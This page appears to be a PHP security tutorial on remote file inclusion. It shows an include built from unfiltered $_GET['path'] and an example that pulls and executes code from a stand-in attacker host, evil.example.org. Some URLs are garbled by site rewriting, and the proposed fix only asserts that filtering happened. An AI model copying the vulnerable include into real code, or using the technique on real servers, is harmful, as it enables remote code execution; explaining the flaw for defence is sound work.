Home > Backend Development > PHP Tutorial > PHP Security-Code Injection

PHP Security-Code Injection

黄舟
Release: 2023-03-05 21:22:01
Original
2553 people have browsed it



Code Injection

A particularly dangerous situation is when you try to use tainted data as the leading part of a dynamic include:

 <?php
 
  include "{$_GET[&#39;path&#39;]}/header.inc";
 
  ?>
Copy after login


In this scenario an attacker can manipulate not only the file name, but also the contained resources. Since PHP can not only include files by default, it can also include the following resources (controlled by allow_url_fopen in the configuration file):

 <?php
 
  include &#39;http://www.google.com/&#39;;
 
  ?>
Copy after login


The include statement will include the web page source code of //m.sbmmt.com/ as a local file at this time. While the above example is harmless, imagine what would happen if the source code returned by GOOGLE contained PHP code. This way the PHP code contained within it will be parsed and executed. This is an opportunity for attackers to release malicious code to defeat your security system.

Imagine that the path value points to the following resource controlled by the attacker:

//m.sbmmt.com/ ... e.org%2Fevil.inc%3F

In the above example, the value of path is URL encoded, and the original value is as follows:

//m.sbmmt.com/

This causes the include statement to include and execute the script selected by the attacker (evil.inc), and the original file name/header.inc will be considered a request string:

  <?php
 
  include 
"http://evil.example.org/evil.inc?/header.inc";
 
  ?>
Copy after login


This avoids the need for the attacker to guess the remaining directory and filename (/header.onc) and create the same path and filename on evil.example.org. On the contrary, when the specific file name of the attacked website is blocked, he only needs to ensure that evil.inc outputs the legal code he wants to execute.

This situation is just as dangerous as allowing an attacker to modify the PHP code directly on your website. Fortunately, this can be prevented by filtering the data before the include and require statements:

<?php
 
  $clean = array();
 
  /* $_GET[&#39;path&#39;] is filtered and stored in 
$clean[&#39;path&#39;]. */
 
  include "{$clean[&#39;path&#39;]}/header.inc";
 
  ?>
Copy after login

The above is the content of PHP security-code injection. For more related content, please pay attention to the PHP Chinese website (m.sbmmt.com )!

Related labels:
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template